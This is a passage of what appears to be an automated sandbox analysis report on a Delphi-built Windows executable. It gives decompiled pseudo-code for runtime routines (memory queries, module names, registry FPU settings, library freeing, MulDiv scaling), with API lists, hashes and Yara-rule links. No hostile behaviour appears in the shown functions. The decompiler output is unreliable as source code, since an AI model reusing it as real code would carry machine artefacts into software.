				void* _t118;

				_t115 = __esi;
				_t114 = __edi;
				_t98 = __ecx;
				_v376 = 0;
				_v340 = 0;
				_v348 = 0;
				_v344 = 0;
				_v8 = 0;
				_push(_t118);
				_push(0x40bbf3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t118 + 0xfffffe8c;
				_t95 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t95 + 0x14)) != 0) {
					_t55 =  *0x479fcc; // 0x406e64
					E00405DCC(_t55, __ecx,  &_v8);
				} else {
					_t92 =  *0x47a124; // 0x406e5c
					E00405DCC(_t92, __ecx,  &_v8);
				}
				_v12 =  *((intOrPtr*)(_t95 + 0x18));
				VirtualQuery( *(_t95 + 0xc),  &_v40, 0x1c);
				if(_v40.State != 0x1000 || GetModuleFileNameA(_v40.AllocationBase,  &_v301, 0x105) == 0) {
					_v372 =  *(_t95 + 0xc);
					_v368 = 5;
					_v364 = _v8;
					_v360 = 0xb;
					_v356 = _v12;
					_v352 = 5;
					_t65 =  *0x479fd8; // 0x406e0c
					E00405DCC(_t65, _t98,  &_v376);
					E0040B658(_t95, _v376, 1, _t114, _t115, 2,  &_v372);
				} else {
					_v336 =  *(_t95 + 0xc);
					_v332 = 5;
					E00404450( &_v344, 0x105,  &_v301);
					E00408504(_v344, 0x105,  &_v340);
					_v328 = _v340;
					_v324 = 0xb;
					_v320 = _v8;
					_v316 = 0xb;
					_v312 = _v12;
					_v308 = 5;
					_t88 =  *0x47a034; // 0x406f04
					E00405DCC(_t88, 0x105,  &_v348);
					E0040B658(_t95, _v348, 1, _t114, _t115, 3,  &_v336);
				}
				_pop(_t107);
				 *[fs:eax] = _t107;
				_push(E0040BBFA);
				E004041E0( &_v376);
				E00404204( &_v348, 3);
				return E004041E0( &_v8);
			}

0x0040ba30
0x0040ba30
0x0040ba30
0x0040ba3c
0x0040ba42
0x0040ba48
0x0040ba4e
0x0040ba54
0x0040ba59
0x0040ba5a
0x0040ba5f
0x0040ba62
0x0040ba68
0x0040ba6f
0x0040ba83
0x0040ba88
0x0040ba71
0x0040ba74
0x0040ba79
0x0040ba79
0x0040ba90
0x0040ba9d
0x0040baa9
0x0040bb68
0x0040bb6e
0x0040bb78
0x0040bb7e
0x0040bb88
0x0040bb8e
0x0040bba4
0x0040bba9
0x0040bbbb
0x0040bacc
0x0040bacf
0x0040bad5
0x0040baed
0x0040bafe
0x0040bb09
0x0040bb0f
0x0040bb19
0x0040bb1f
0x0040bb29
0x0040bb2f
0x0040bb45
0x0040bb4a
0x0040bb5c
0x0040bb61
0x0040bbc4
0x0040bbc7
0x0040bbca
0x0040bbd5
0x0040bbe5
0x0040bbf2

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040BBF3), ref: 0040BA9D
GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040BBF3), ref: 0040BABF

Part of subcall function 00405DCC: LoadStringA.USER32(00000000,00010000,?,00001000), ref: 00405DFE

Strings

\n@, xrefs: 0040BA74
0w@, xrefs: 0040BB57, 0040BBB6
dn@, xrefs: 0040BA83

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: FileLoadModuleNameQueryStringVirtual
String ID: 0w@$\n@$dn@
API String ID: 902310565-2541937206
Opcode ID: f6782b070e71f58a5011ba0ab88ba44714884a3a32117b389ef0351287ffb3a6
Instruction ID: b0dd67af656762c7e97f47114aef24cedb7d8fe3e8e177282f8d088163ffabc9
Opcode Fuzzy Hash: f6782b070e71f58a5011ba0ab88ba44714884a3a32117b389ef0351287ffb3a6
Instruction Fuzzy Hash: AD51E470A00658DFDB61DF68CD85BC9BBF4AB48304F4044EAE508AB291D778AE84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3BC, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B3BC(intOrPtr* __eax, void* __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v277;
				char _v538;
				char _v794;
				struct _MEMORY_BASIC_INFORMATION _v824;
				char _v828;
				intOrPtr _v832;
				char _v836;
				intOrPtr _v840;
				char _v844;
				intOrPtr _v848;
				char _v852;
				char* _v856;
				char _v860;
				char _v864;
				char _v1120;
				void* __edi;
				struct HINSTANCE__* _t45;
				intOrPtr _t58;
				struct HINSTANCE__* _t60;
				void* _t78;
				intOrPtr* _t83;
				void* _t94;
				void* _t95;
				void* _t102;

				_t102 = __fp0;
				_t84 = __ecx;
				_t94 = __ecx;
				_t95 = __edx;
				_t83 = __eax;
				VirtualQuery(__edx,  &_v824, 0x1c);
				if(_v824.State != 0x1000 || GetModuleFileNameA(_v824.AllocationBase,  &_v538, 0x105) == 0) {
					_t45 =  *0x47b660; // 0x400000
					GetModuleFileNameA(_t45,  &_v538, 0x105);
					_v16 = E0040B3B0(_t95);
				} else {
					_v16 = _t95 - _v824.AllocationBase;
				}
				E004086A4( &_v277, 0x104, E0040C394( &_v538, _t84, 0x5c) + 1);
				_v8 = 0x40b54c;
				_v12 = 0x40b54c;
				_t91 =  *0x407084; // 0x4070d0
				if(E00403604(_t83, _t91) != 0) {
					_v8 = E004046A0( *((intOrPtr*)(_t83 + 4)));
					_t78 = E00408640(_v8, _t94);
					if(_t78 != 0) {
						_t91 = _v8;
						if( *((char*)(_v8 + _t78 - 1)) != 0x2e) {
							_v12 = 0x40b550;
						}
					}
				}
				_t58 =  *0x47a0e8; // 0x406e34
				_t21 = _t58 + 4; // 0xffe9
				_t60 =  *0x47b660; // 0x400000
				LoadStringA(E00405290(_t60, 0x104, _t91),  *_t21,  &_v794, 0x100);
				E004033BC( *_t83,  &_v1120);
				_v864 =  &_v1120;
				_v860 = 4;
				_v856 =  &_v277;
				_v852 = 6;
				_v848 = _v16;
				_v844 = 5;
				_v840 = _v8;
				_v836 = 6;
				_v832 = _v12;
				_v828 = 6;
				E00408D00(_t94, _a4, _t102, 4,  &_v864);
				return E00408640(_t94, _t94);
			}

0x0040b3bc
0x0040b3bc
0x0040b3c8
0x0040b3ca
0x0040b3cc
0x0040b3d8
0x0040b3e7
0x0040b411
0x0040b417
0x0040b423
0x0040b428
0x0040b42e
0x0040b42e
0x0040b44c
0x0040b456
0x0040b45e
0x0040b463
0x0040b470
0x0040b47a
0x0040b480
0x0040b487
0x0040b489
0x0040b491
0x0040b498
0x0040b498
0x0040b491
0x0040b487
0x0040b4a7
0x0040b4ac
0x0040b4b0
0x0040b4bb
0x0040b4c8
0x0040b4d3
0x0040b4d9
0x0040b4e6
0x0040b4ec
0x0040b4f6
0x0040b4fc
0x0040b506
0x0040b50c
0x0040b516
0x0040b51c
0x0040b537
0x0040b549

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040B3D8
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040B3FC
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040B417
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0040B4BB

Strings

4n@, xrefs: 0040B4A7

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID: 4n@
API String ID: 3990497365-1367446503
Opcode ID: 44968bae4f9ef14eb2b8bf7f419ae5663944d8900fc040b47ab0cc494bdda230
Instruction ID: abc8db870bbcfda5cc4450769f027c33700e98228bdea53df84d11bceb803542
Opcode Fuzzy Hash: 44968bae4f9ef14eb2b8bf7f419ae5663944d8900fc040b47ab0cc494bdda230
Instruction Fuzzy Hash: 7841E970A006589FCB11DF59CD85B9EB7B8EB48304F0440FAEA08E7291D7789F848F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3BA, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B3BA(intOrPtr* __eax, void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v277;
				char _v538;
				char _v794;
				struct _MEMORY_BASIC_INFORMATION _v824;
				char _v828;
				intOrPtr _v832;
				char _v836;
				intOrPtr _v840;
				char _v844;
				intOrPtr _v848;
				char _v852;
				char* _v856;
				char _v860;
				char _v864;
				char _v1120;
				void* __edi;
				struct HINSTANCE__* _t45;
				intOrPtr _t58;
				struct HINSTANCE__* _t60;
				void* _t78;
				intOrPtr* _t84;
				void* _t97;
				void* _t100;
				void* _t114;

				_t86 = __ecx;
				_t97 = __ecx;
				_t100 = __edx;
				_t84 = __eax;
				VirtualQuery(__edx,  &_v824, 0x1c);
				if(_v824.State != 0x1000 || GetModuleFileNameA(_v824.AllocationBase,  &_v538, 0x105) == 0) {
					_t45 =  *0x47b660; // 0x400000
					GetModuleFileNameA(_t45,  &_v538, 0x105);
					_v16 = E0040B3B0(_t100);
				} else {
					_v16 = _t100 - _v824.AllocationBase;
				}
				E004086A4( &_v277, 0x104, E0040C394( &_v538, _t86, 0x5c) + 1);
				_v8 = 0x40b54c;
				_v12 = 0x40b54c;
				_t93 =  *0x407084; // 0x4070d0
				if(E00403604(_t84, _t93) != 0) {
					_v8 = E004046A0( *((intOrPtr*)(_t84 + 4)));
					_t78 = E00408640(_v8, _t97);
					if(_t78 != 0) {
						_t93 = _v8;
						if( *((char*)(_v8 + _t78 - 1)) != 0x2e) {
							_v12 = 0x40b550;
						}
					}
				}
				_t58 =  *0x47a0e8; // 0x406e34
				_t21 = _t58 + 4; // 0xffe9
				_t60 =  *0x47b660; // 0x400000
				LoadStringA(E00405290(_t60, 0x104, _t93),  *_t21,  &_v794, 0x100);
				E004033BC( *_t84,  &_v1120);
				_v864 =  &_v1120;
				_v860 = 4;
				_v856 =  &_v277;
				_v852 = 6;
				_v848 = _v16;
				_v844 = 5;
				_v840 = _v8;
				_v836 = 6;
				_v832 = _v12;
				_v828 = 6;
				E00408D00(_t97, _a4, _t114, 4,  &_v864);
				return E00408640(_t97, _t97);
			}

0x0040b3ba
0x0040b3c8
0x0040b3ca
0x0040b3cc
0x0040b3d8
0x0040b3e7
0x0040b411
0x0040b417
0x0040b423
0x0040b428
0x0040b42e
0x0040b42e
0x0040b44c
0x0040b456
0x0040b45e
0x0040b463
0x0040b470
0x0040b47a
0x0040b480
0x0040b487
0x0040b489
0x0040b491
0x0040b498
0x0040b498
0x0040b491
0x0040b487
0x0040b4a7
0x0040b4ac
0x0040b4b0
0x0040b4bb
0x0040b4c8
0x0040b4d3
0x0040b4d9
0x0040b4e6
0x0040b4ec
0x0040b4f6
0x0040b4fc
0x0040b506
0x0040b50c
0x0040b516
0x0040b51c
0x0040b537
0x0040b549

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040B3D8
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040B3FC
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040B417
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0040B4BB

Strings

4n@, xrefs: 0040B4A7

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID: 4n@
API String ID: 3990497365-1367446503
Opcode ID: cace2300fae6ea98d17bc0197f0dc988fc7fdf201818fed84b48544fd9351745
Instruction ID: f2dd7514a248642dcad931f283bb70ad1c74d4f6ac89fa753c81d6b2a783f548
Opcode Fuzzy Hash: cace2300fae6ea98d17bc0197f0dc988fc7fdf201818fed84b48544fd9351745
Instruction Fuzzy Hash: E441D870A006589FDB51DB59CD85B9EB7E8EB48304F0440FAA608E7291D7789F848F99

Uniqueness

Uniqueness Score: -1.00%

Function 00419666, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
threadCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00419666(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr* _v12;
				long _v16;
				char _v20;
				char _v24;
				long _t22;
				char _t29;
				void* _t53;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr _t63;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xffffffec;
				_push(__esi);
				_push(__edi);
				_t53 = __eax;
				_t22 = GetCurrentThreadId();
				_t62 =  *0x47a11c; // 0x47b030
				if(_t22 !=  *_t62) {
					_v24 = GetCurrentThreadId();
					_v20 = 0;
					_t61 =  *0x479fc0; // 0x410b4c
					E0040B714(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
					E00403BF4();
				}
				if(_t53 <= 0) {
					E00419640();
				} else {
					E0041964C(_t53);
				}
				_v16 = 0;
				_push(0x47b884);
				L0040628C();
				_push(_t72);
				_push(0x4197f6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v16 = InterlockedExchange(0x4793e8, _v16);
				_push(_t72);
				_push(0x4197d7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				_v5 = _t29;
				if(_v5 == 0) {
					L16:
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(E004197DE);
					return E0040346C(_v16);
				} else {
					if( *((intOrPtr*)(_v16 + 8)) > 0) {
						_v12 = E00413E68(_v16, 0);
						E00413D58(_v16, 0);
						L004063B4();
						 *[fs:eax] = _t74;
						 *[fs:eax] = _t74;
						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x4197a1, _t72, 0x47b884);
						_pop(_t66);
						 *[fs:eax] = _t66;
						_t67 = 0x419772;
						 *[fs:eax] = _t67;
						_push(E004197A8);
						_push(0x47b884);
						L0040628C();
						return 0;
					} else {
						goto L16;
					}
				}
			}

APIs

GetCurrentThreadId.KERNEL32 ref: 00419673
GetCurrentThreadId.KERNEL32 ref: 00419682
RtlEnterCriticalSection.NTDLL(0047B884), ref: 004196C7
InterlockedExchange.KERNEL32(004793E8,?), ref: 004196E3

Strings

8&A, xrefs: 0041969C

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CurrentThread$CriticalEnterExchangeInterlockedSection
String ID: 8&A
API String ID: 2380408948-389848856
Opcode ID: d28a535c856f93c6a4f2099c5b9d9603b9f422e21454ec69e133c63dd92d6dbe
Instruction ID: a88dfb39b16e47c9de266cc581526034df6ee9f0b2d60ce30e4bcf8b329ee864
Opcode Fuzzy Hash: d28a535c856f93c6a4f2099c5b9d9603b9f422e21454ec69e133c63dd92d6dbe
Instruction Fuzzy Hash: 5021B330A14204EED711EFA5C8A1BEEB7F8EF05304F55847AE414A62D1D77C9D90CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004032E0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E004032E0() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x479020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x479020; // 0x1372
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x479020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00403351);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x403358);
					return RegCloseKey(_v8);
				}
			}

0x004032e1
0x004032e3
0x004032ed
0x00403309
0x00403358
0x0040336a
0x0040336d
0x00403376
0x0040330b
0x0040330d
0x0040330e
0x00403313
0x00403316
0x00403319
0x00403335
0x0040333c
0x0040333f
0x00403342
0x00403350
0x00403350

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403302
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403351,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403335
RegCloseKey.ADVAPI32(?,00403358,00000000,?,00000004,00000000,00403351,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040334B

Strings

FPUMaskValue, xrefs: 0040332C
SOFTWARE\Borland\Delphi\RTL, xrefs: 004032F8

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: d51f590f3b47781ab56e038d20767543010de86fd7e3ec06f9fed5876e474b14
Instruction ID: 484a0184172b21eeaec57baafc58b867f6ad0a94555a977e479d281095782bf4
Opcode Fuzzy Hash: d51f590f3b47781ab56e038d20767543010de86fd7e3ec06f9fed5876e474b14
Instruction Fuzzy Hash: 9D017579A50348BADB11EF91CD82FAD77BCEB08701F6001B6B904F65D0E6785A50C75C

Uniqueness

Uniqueness Score: -1.00%

Function 00425610, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00425610(void* __ecx) {
				struct HINSTANCE__* _t7;
				struct HINSTANCE__* _t9;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t16;
				intOrPtr _t19;

				_push(_t19);
				_push(0x42567f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t19;
				 *0x47bac8 =  *0x47bac8 + 1;
				if( *0x47bac8 == 0) {
					if( *0x47bacc != 0) {
						_t9 =  *0x47bacc; // 0x0
						FreeLibrary(_t9);
					}
					if( *0x47bad0 != 0) {
						_t7 =  *0x47bad0; // 0x0
						FreeLibrary(_t7);
					}
					_t15 =  *0x425570; // 0x425574
					E00404C20(0x4798e4, _t15);
					_t16 =  *0x425570; // 0x425574
					E00404C20(0x4798d8, _t16);
				}
				_pop(_t14);
				 *[fs:eax] = _t14;
				_push(0x425686);
				return 0;
			}

0x00425615
0x00425616
0x0042561b
0x0042561e
0x00425621
0x00425627
0x00425630
0x00425632
0x00425638
0x00425638
0x00425644
0x00425646
0x0042564c
0x0042564c
0x00425656
0x0042565c
0x00425666
0x0042566c
0x0042566c
0x00425673
0x00425676
0x00425679
0x0042567e

APIs

FreeLibrary.KERNEL32(00000000,00000000,0042567F), ref: 00425638
FreeLibrary.KERNEL32(00000000,00000000,0042567F), ref: 0042564C

Strings

\UB, xrefs: 00425661
tUB, xrefs: 00425656, 00425666
\UB, xrefs: 00425651

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: \UB$\UB$tUB
API String ID: 3664257935-1928697032
Opcode ID: 755789ffe76009dbdbc9caf21a59f898bd655be3ab5ff13d5e855cf5134ae907
Instruction ID: 1c60eac0ed794dc18dcee17fc6a9feea87a942e861012fce1fd09beb1d7731ca
Opcode Fuzzy Hash: 755789ffe76009dbdbc9caf21a59f898bd655be3ab5ff13d5e855cf5134ae907
Instruction Fuzzy Hash: 37F09A70304A009FD722BB25FC15B2233A8F785300BC6847BE508C2AA4D3BC9C92CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00444154, Relevance: 7.7, APIs: 5, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00444154(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				int _t100;
				int _t102;
				intOrPtr _t119;
				int _t124;
				intOrPtr _t157;
				signed char _t165;
				signed char _t166;
				void* _t168;
				signed char _t183;
				intOrPtr _t185;
				intOrPtr _t197;
				void* _t200;
				void* _t202;
				int _t203;
				intOrPtr _t207;
				void* _t209;
				signed char _t210;

				_t200 = __edi;
				_t206 = _t207;
				_t202 = __edx;
				_v8 = __eax;
				E0042EF10(_v8);
				_push(_t207);
				_push(0x4443bc);
				_push( *[fs:edx]);
				 *[fs:edx] = _t207;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t168 = 0;
				_t209 = E004033F8( *_v8) -  *0x440fe8; // 0x441034
				if(_t209 == 0) {
					_t165 =  *0x47b65d; // 0x0
					_t166 = _t165 ^ 0x00000001;
					_t210 = _t166;
					 *(_v8 + 0x234) = _t166;
				}
				E0042E66C(_v8, _t168, _t202, _t210);
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L14:
					_t100 =  *(_v8 + 0x268);
					_t219 = _t100;
					if(_t100 > 0) {
						E0042B974(_v8, _t100, _t219);
					}
					_t102 =  *(_v8 + 0x26c);
					_t220 = _t102;
					if(_t102 > 0) {
						E0042B9B8(_v8, _t102, _t220);
					}
					_t183 =  *0x4443c8; // 0x0
					 *(_v8 + 0x98) = _t183;
					_t221 = _t168;
					if(_t168 == 0) {
						E004437B4(_v8, 1, 1);
						E004320D0(_v8, 1, 1, _t221);
					}
					E0042D0C4(_v8, 0, 0xb03d, 0);
					_pop(_t185);
					 *[fs:eax] = _t185;
					_push(0x4443c3);
					return E0042EF18(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t197 =  *0x47bba0; // 0x2321310
						_t23 = _t197 + 0x40; // 0x60
						if( *(_v8 + 0x25c) !=  *_t23) {
							_t157 =  *0x47bba0; // 0x2321310
							_t26 = _t157 + 0x40; // 0x60
							E0041CA50( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041CA48( *((intOrPtr*)(_v8 + 0x68))),  *_t26,  *(_v8 + 0x25c)), _t200, _t206);
						}
					}
					_t119 =  *0x47bba0; // 0x2321310
					_t29 = _t119 + 0x40; // 0x60
					 *(_v8 + 0x25c) =  *_t29;
					_t203 = E004444EC(_v8);
					_t124 =  *(_v8 + 0x270);
					_t215 = _t203 - _t124;
					if(_t203 != _t124) {
						_t168 = 1;
						E004437B4(_v8, _t124, _t203);
						E004320D0(_v8,  *(_v8 + 0x270), _t203, _t215);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t203,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t203,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t203,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t203,  *(_v8 + 0x270));
						}
					}
					goto L14;
				}
			}

0x00444154
0x00444155
0x0044415a
0x0044415c
0x00444162
0x00444169
0x0044416a
0x0044416f
0x00444172
0x0044417a
0x00444185
0x00444190
0x00444196
0x004441a2
0x004441a8
0x004441aa
0x004441af
0x004441af
0x004441b4
0x004441b4
0x004441bf
0x004441ce
0x00444330
0x00444333
0x00444339
0x0044433b
0x00444342
0x00444342
0x0044434a
0x00444350
0x00444352
0x00444359
0x00444359
0x00444361
0x00444367
0x0044436d
0x0044436f
0x0044437e
0x00444390
0x00444390
0x004443a1
0x004443a8
0x004443ab
0x004443ae
0x004443bb
0x004441e4
0x004441ee
0x004441f9
0x004441ff
0x00444202
0x0044420e
0x00444213
0x0044422e
0x0044422e
0x00444202
0x00444233
0x00444238
0x0044423e
0x0044424c
0x00444251
0x00444257
0x00444259
0x0044425f
0x00444268
0x0044427b
0x0044428a
0x004442a9
0x004442a9
0x004442b9
0x004442d8
0x004442d8
0x004442e8
0x00444307
0x0044432a
0x0044432a
0x004442e8
0x00000000
0x00444259

APIs

MulDiv.KERNEL32(00000000,00000060,00000000), ref: 00444225
MulDiv.KERNEL32(?,00000000,00000000), ref: 004442A1
MulDiv.KERNEL32(?,00000000,00000000), ref: 004442D0
MulDiv.KERNEL32(?,00000000,00000000), ref: 004442FF
MulDiv.KERNEL32(?,00000000,00000000), ref: 00444322

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd451bca6ec8968766b4cdbe1f8e4332541abe440ea9dc8db5020fef113309d7
Instruction ID: f103d02a6e5df238344e8f5a8e094d9055898c63f1c7f074f4753733dc3936e2
Opcode Fuzzy Hash: bd451bca6ec8968766b4cdbe1f8e4332541abe440ea9dc8db5020fef113309d7
Instruction Fuzzy Hash: 0671B274B04108EFDB04DBA9C589BAEB7F5AF48304F6941F5A808DB362CB75AE41DB44

Uniqueness

Uniqueness Score: -1.00%

Function 0043BC8C, Relevance: 7.7, APIs: 5, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0043BC8C(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x43be70);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E0043DC64(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E0043F2D0(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E00404278( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E004045EC(_v16, 0x43be94);
					if(_t153 != 0) {
						E0041D150( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
